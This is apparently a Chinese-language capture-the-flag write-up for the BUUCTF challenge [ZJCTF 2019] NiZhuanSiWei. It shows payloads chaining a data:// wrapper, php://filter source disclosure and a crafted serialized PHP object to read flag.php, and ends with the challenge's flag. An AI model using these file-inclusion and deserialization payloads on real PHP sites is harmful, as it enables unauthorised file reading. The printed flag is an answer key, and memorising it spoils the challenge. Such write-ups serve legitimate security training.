web buuctf [ZJCTF 2019]NiZhuanSiWei1

一共有三个参数，需要考虑传参，php传参，而且是text和file这样的值，基本可以考虑需要用php伪协议 ，

php伪协议是基于文件包含的，文件包含有本地包含和远程包含，

当包含的文件在远程服务器上时，就形成了远程文件包含。

远程文件包含需要在 php.ini 中设置：

allow_url_include = on（是否允许 include/require 远程文件）
allow_url_fopen = on（是否允许打开远程文件）

php伪协议是php支持的协议和封装协议

贴（我从微博里找的，大致内容都有写）：

1.条件 file_get_contents($text,'r')==="welcome to the zjctf"，

利用在线base4编码工具对welcome to the zjctf进行编码，得到

利用data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

2. 

if里的正则匹配表示file和flag有关系，include()是在php里面调用php文件，从注释里可以看出来调用的是useless.php，根据下面的代码，需要看到useless.php，于是令

file=php://filter/read=convert.base64-encode/resource=useless.php 

(不用这个伪协议，useless.php文件直接运行，不会有返回源码，使用伪协议会将源码进行返回)

将下面的base64解码，得到

class Flag{ //flag.php
public $file;
public function __tostring()
  {
    if(isset($this->file))
      {echo file_get_contents($this->file);
       echo "
";
       return ("U R SO CLOSE !///COME ON PLZ");
      }
  }
} 
?>

 3.引用的FLAG类，根据注释flag.php，里面的文件是flag.php,我们还需要知道password的值是什么，根据后面的代码，password应该是序列化后的值，这个是就是Flag类下的flag.php，于是序列化后为O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}这就是password的值

4.构造payload：

text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}，进入界面查看源码，可以得到flag

flag{c77bdfc1-8a0f-4ce8-950a-4cdf2f97046d}